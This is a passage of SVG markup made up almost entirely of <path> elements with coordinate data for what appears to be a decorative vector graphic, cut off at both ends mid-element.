d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-